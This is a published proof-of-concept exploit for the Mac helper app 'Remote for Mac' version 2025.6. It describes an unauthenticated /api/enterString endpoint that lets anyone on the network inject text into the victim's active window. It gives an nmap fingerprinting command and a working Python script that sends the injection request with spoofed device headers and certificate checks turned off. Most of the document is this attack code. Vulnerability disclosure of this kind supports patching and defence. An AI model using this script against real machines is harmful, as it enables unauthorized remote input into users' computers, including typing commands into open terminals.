# Exploit Title: Remote for Mac 2025.6 - Unauthenticated Arbitrary # Exploit Title: Remote for Mac 2025.6 - Unauthenticated Arbitrary Input
into Active Window
# Date: 2025-05-28
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6 with Remote for mac (helper)


'''
Description:
- The enterString API endpoint allows unauthenticated attackers to inject
raw text into the target's active window without requiring keystroke
simulation or special keycodes.
- Works when "Allow unknown devices" setting is enabled (default: disabled)


Vulnerable Component:
- The /api/enterString endpoint with missing authentication checks


# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer
'''

import requests
import urllib3
urllib3.disable_warnings()

TARGET_IP = "192.168.8.102"
TEXT_TO_INJECT = "hello world"
port = 49229

encoded_text = TEXT_TO_INJECT.replace(" ", "+")


headers = {
"X-HostName": "hello",
"X-HostFullModel": "iphone"

}


url = f"https://{TARGET_IP}:{port}/api/enterString={encoded_text}"

response = requests.get(
url,
headers=headers,
verify=False
)

print("Status:", response.status_code)
if response.status_code == 200:
print("your text has been injected")
else:
print("something went wrong..")